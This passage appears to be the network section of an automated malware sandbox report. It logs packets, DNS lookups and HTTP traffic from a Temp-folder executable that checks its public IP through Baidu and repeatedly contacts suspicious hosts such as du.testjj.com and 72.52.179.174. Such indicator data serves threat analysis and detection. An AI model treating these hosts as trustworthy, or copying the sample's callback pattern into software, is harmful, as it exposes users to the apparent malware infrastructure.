Jul 25, 2024 02:19:53.258805037 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.258833885 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.258847952 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.258877039 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.258884907 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.258977890 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.258979082 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.342731953 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.342801094 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.342865944 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.457636118 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.457695007 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.457706928 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.457731009 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.457762957 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.457914114 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.460608006 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.460659981 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.460692883 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.460760117 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.460760117 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.463560104 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.463596106 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.463625908 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.463638067 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.463638067 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.463809967 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.463812113 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.464123011 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.468183994 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.468238115 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.468269110 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.468307018 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.468307018 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.468307018 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.471074104 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.471127987 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.471158981 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.471194029 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.471276045 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.667017937 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.667069912 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.667102098 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.667109966 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.667109966 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.667284966 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.671243906 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.671263933 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.671282053 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.671539068 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.671539068 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.674299955 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.674319983 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.674340963 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.674583912 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.674583912 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.677556992 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.677643061 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.677658081 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.677681923 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.677706003 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:53.759001970 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:19:53.761267900 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:19:54.775641918 CEST4434970272.52.179.174192.168.2.7
Jul 25, 2024 02:19:54.775713921 CEST49702443192.168.2.772.52.179.174
Jul 25, 2024 02:19:54.776568890 CEST49702443192.168.2.772.52.179.174
Jul 25, 2024 02:19:54.776592016 CEST4434970272.52.179.174192.168.2.7
Jul 25, 2024 02:19:55.207149982 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.207200050 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.207376957 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.208924055 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.208939075 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.902482033 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.902632952 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.903629065 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.904335976 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.907484055 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.907496929 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.907814026 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:55.912503004 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:55.960503101 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:56.166548967 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:56.166635990 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:56.166765928 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:56.179915905 CEST49708443192.168.2.7103.224.212.216
Jul 25, 2024 02:19:56.179944038 CEST44349708103.224.212.216192.168.2.7
Jul 25, 2024 02:19:56.575356007 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:56.575408936 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:56.575474024 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:56.575975895 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:56.575994015 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.260245085 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.260453939 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.261043072 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.261363983 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.267421007 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.267431974 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.267736912 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.270641088 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.316514969 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.532381058 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.532509089 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.535866976 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.606165886 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.606199026 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:20:01.540254116 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.540302992 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:01.540637016 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.549787998 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.549813986 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:04.477406025 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:04.477488041 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:04.477948904 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:04.477994919 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:09.646814108 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.646852016 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:09.646914959 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.647355080 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.647365093 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:12.568268061 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:12.568418026 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:12.568752050 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:12.568768024 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:17.587205887 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587250948 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:17.587357998 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587791920 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587805033 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:20.502867937 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:20.503052950 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:20.503381014 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:20.503401995 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:25.523578882 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.523616076 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:25.523705959 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.537221909 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.537239075 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:28.497716904 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:28.497858047 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:28.498214960 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:28.498241901 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:33.774899006 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.774959087 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:33.775161028 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.775592089 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.775612116 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:36.712219000 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:36.712435961 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:36.712743044 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:36.712774038 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:41.726954937 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727006912 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:41.727071047 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727550983 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727561951 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:44.834012032 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:44.834116936 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:44.834646940 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:44.834666014 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:49.854026079 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854082108 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:49.854187012 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854581118 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854597092 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:51.813291073 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:20:51.813405037 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:20:52.830919027 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:52.831063986 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:52.831433058 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:52.831461906 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:57.851447105 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.851495981 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:20:57.851572037 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.864996910 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.865015984 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.806560040 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.807998896 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808392048 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808422089 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.808506012 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808515072 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:05.820602894 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.820650101 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:05.820734024 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.834160089 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.834178925 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:08.777955055 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:08.778038025 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:08.778455973 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:08.778476000 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:13.846995115 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847048998 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:13.847106934 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847521067 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847539902 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:16.823708057 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:16.823815107 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:16.824210882 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:16.824229956 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:21.836102009 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836142063 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:21.836219072 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836631060 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836644888 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:24.771312952 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:24.771378994 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:24.771758080 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:24.771778107 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:29.789392948 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789437056 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:29.789546967 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789964914 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789975882 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:32.728606939 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:32.728746891 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:32.742465973 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:32.742506027 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:37.914264917 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914310932 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:37.914410114 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914868116 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914884090 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:40.130414009 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:21:40.135855913 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:21:40.885808945 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:40.885979891 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:40.886271954 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:40.886297941 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:45.898969889 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899020910 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:45.899130106 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899549007 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899559021 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:48.855900049 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:48.856147051 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:48.856414080 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:48.856437922 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:53.869878054 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.869987011 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:53.870086908 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.870605946 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.870640993 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:56.803601980 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:56.803711891 CEST49764443192.168.2.772.52.179.174

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 25, 2024 02:19:50.242270947 CEST5615053192.168.2.71.1.1.1
Jul 25, 2024 02:19:50.472724915 CEST53561501.1.1.1192.168.2.7
Jul 25, 2024 02:19:51.416290998 CEST4997053192.168.2.71.1.1.1
Jul 25, 2024 02:19:51.696835995 CEST53499701.1.1.1192.168.2.7
Jul 25, 2024 02:19:54.789952040 CEST5323353192.168.2.71.1.1.1
Jul 25, 2024 02:19:54.979542017 CEST5120953192.168.2.71.1.1.1
Jul 25, 2024 02:19:55.097786903 CEST53532331.1.1.1192.168.2.7
Jul 25, 2024 02:19:56.231825113 CEST5115953192.168.2.71.1.1.1
Jul 25, 2024 02:19:56.573843956 CEST53511591.1.1.1192.168.2.7

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Jul 25, 2024 02:19:50.242270947 CEST192.168.2.71.1.1.10x8032Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
Jul 25, 2024 02:19:51.416290998 CEST192.168.2.71.1.1.10x2c8aStandard query (0)du.testjj.comA (IP address)IN (0x0001)false
Jul 25, 2024 02:19:54.789952040 CEST192.168.2.71.1.1.10x7d5cStandard query (0)da.testiu.comA (IP address)IN (0x0001)false
Jul 25, 2024 02:19:54.979542017 CEST192.168.2.71.1.1.10x7565Standard query (0)time.windows.comA (IP address)IN (0x0001)false
Jul 25, 2024 02:19:56.231825113 CEST192.168.2.71.1.1.10x85c0Standard query (0)db.testyk.comA (IP address)IN (0x0001)false

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Jul 25, 2024 02:19:50.472724915 CEST1.1.1.1192.168.2.70x8032No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
Jul 25, 2024 02:19:50.472724915 CEST1.1.1.1192.168.2.70x8032No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
Jul 25, 2024 02:19:50.472724915 CEST1.1.1.1192.168.2.70x8032No error (0)www.wshifen.com103.235.46.96A (IP address)IN (0x0001)false
Jul 25, 2024 02:19:50.472724915 CEST1.1.1.1192.168.2.70x8032No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
Jul 25, 2024 02:19:51.696835995 CEST1.1.1.1192.168.2.70x2c8aNo error (0)du.testjj.com72.52.179.174A (IP address)IN (0x0001)false
Jul 25, 2024 02:19:54.988118887 CEST1.1.1.1192.168.2.70x7565No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
Jul 25, 2024 02:19:55.097786903 CEST1.1.1.1192.168.2.70x7d5cNo error (0)da.testiu.com103.224.212.216A (IP address)IN (0x0001)false
Jul 25, 2024 02:19:56.573843956 CEST1.1.1.1192.168.2.70x85c0No error (0)db.testyk.com103.224.212.211A (IP address)IN (0x0001)false

HTTP Request Dependency Graph

  • da.testiu.com
  • db.testyk.com
  • www.baidu.com

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.749699103.235.46.96802760C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
TimestampBytes transferredDirectionData
Jul 25, 2024 02:19:50.484626055 CEST77OUTGET /s?ie=utf-8&wd=ip HTTP/1.1
User-Agent: UrlTest1
Host: www.baidu.com
Jul 25, 2024 02:19:51.775079966 CEST1236INHTTP/1.1 200 OK
Bdpagetype: 3
Bdqid: 0x913a9748007ce3f9
Cache-Control: private
Connection: keep-alive
Content-Security-Policy: frame-ancestors 'self' https://chat.baidu.com http://mirror-chat.baidu.com https://fj-chat.baidu.com https://hba-chat.baidu.com https://hbe-chat.baidu.com https://njjs-chat.baidu.com https://nj-chat.baidu.com https://hna-chat.baidu.com https://hnb-chat.baidu.com http://debug.baidu-int.com;
Content-Type: text/html;charset=utf-8
Cxy_all: baidu+403b0d6b46f8049133dc443934ae8a33
Cxy_ex: 1721866791+561720840+d41d8cd98f00b204e9800998ecf8427e
Date: Thu, 25 Jul 2024 00:19:51 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Set-Cookie: BAIDUID=79CBBF35805A5A85A7ECF67663790756:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=79CBBF35805A5A85A7ECF67663790756; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1721866791; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUID=79CBBF35805A5A85DF6A3F153FEEA7E6:FG=1; max-age=31536000; expires=Fri, 25-Jul-25 00:19:51 GMT; domain=.baidu.c
Data Raw:
Data Ascii:
Jul 25, 2024 02:19:51.775096893 CEST224INData Raw: 6d 3b 20 70 61 74 68 3d 2f 3b 20 76 65 72 73 69 6f 6e 3d 31 3b 20 63 6f 6d 6d 65 6e 74 3d 62 64 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 48 5f 50 53 5f 50 53 53 49 44 3d 36 30 32 33 37 5f 36 30 32 37 36 5f 36 30 33 36 30 5f 36 30 34 36 37 5f 36
Data Ascii: m; path=/; version=1; comment=bdSet-Cookie: H_PS_PSSID=60237_60276_60360_60467_60492_60501_60472; path=/; expires=Fri, 25-Jul-25 00:19:51 GMT; domain=.baidu.comSet-Cookie: X-Use-Search-BFF-WWW=deleted; expires=Thu, 01-Ja
Jul 25, 2024 02:19:51.775110960 CEST1236INData Raw: 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 62 61 69 64 75 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 65 6c 50 65 72 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61
Data Ascii: n-1970 00:00:01 GMT; path=/; domain=.baidu.comSet-Cookie: delPer=0; path=/; domain=.baidu.comSet-Cookie: BD_CK_SAM=1;path=/Set-Cookie: PSINO=7; domain=.baidu.com; path=/Set-Cookie: BDSVRTM=371; path=/Traceid: 172186679134843668581046
Jul 25, 2024 02:19:51.775125980 CEST1236INData Raw: 2f 63 6f 73 6d 69 63 2f 70 63 2f 63 6f 73 2d 69 63 6f 6e 5f 39 39 66 36 35 36 65 2e 63 73 73 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 68 72 65 66
Data Ascii: /cosmic/pc/cos-icon_99f656e.css"/><link rel="apple-touch-icon-precomposed" href="https://psstatic.cdn.bcebos.com/video/wiseindex/aa6eef91f8b5b1a33b454c401_1660835115000.png"><title>ip_</title><style data-for="r
Jul 25, 2024 02:19:51.775135994 CEST164INData Raw: 72 7d 0a 2e 70 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 32 70 74 7d 0a 2e 70 32 7b 77 69 64 74 68 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 3b 6d 61 72 67 69 6e 2d
Data Ascii: r}.p1{line-height:120%;margin-left:-12pt}.p2{width:100%;line-height:120%;margin-left:-12pt}#wrapper{_zoom:1}#container{word-break:break-all;word-wrap:break-word
Jul 25, 2024 02:19:51.775242090 CEST1236INData Raw: 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 5f 73 7b 77 69 64 74 68 3a 31 30 30 32 70 78 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 5f 6c 7b 77 69 64 74 68 3a 31 32 32 32 70 78 7d 0a 23 63 6f 6e 74 65 6e 74
Data Ascii: ;position:relative}.container_s{width:1002px}.container_l{width:1222px}#content_left{width:636px;float:left;padding-left:35px}#content_right{border-left:1px solid #e1e1e1;float:right}.container_s #content_right{width:271px}.container_l #
Jul 25, 2024 02:19:51.775254965 CEST1236INData Raw: 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 0a 2e 73 5f 6e 61 76 20 2e 73 5f 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 0a 2e 73 5f 74 61 62 7b 6c 69 6e 65 2d 68
Data Ascii: in-right:20px;float:left}.s_nav .s_logo img{border:0;display:block}.s_tab{line-height:18px;padding:20px 0 0;float:left}.s_nav a{color:#00c;font-size:14px}.s_nav b{font-size:14px}.s_ipt_wr{width:536px;height:30px;display:inline-block;margi
Jul 25, 2024 02:19:51.775408030 CEST1236INData Raw: 61 6e 69 6d 61 74 69 6f 6e 3a 79 75 6e 79 69 6e 67 20 2e 32 73 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 3a 79 75 6e 79 69 6e 67 20 2e 32 73 7d 0a 2e 79 79 5f 66 6d 5f 62 6c 75 65 20 2e 73 5f 69 70 74 5f 77 72 2c 2e 79 79 5f 66 6d 5f 62 6c 75 65 20
Data Ascii: animation:yunying .2s;-o-animation:yunying .2s}.yy_fm_blue .s_ipt_wr,.yy_fm_blue .s_ipt_wr.iptfocus,.yy_fm_blue .s_ipt_wr:hover,.yy_fm_blue .s_ipt_wr.ipthover{animation:yy-ipt-blue .2s;border-color:#4791ff transparent #4791ff #4791ff}.yy_fm_
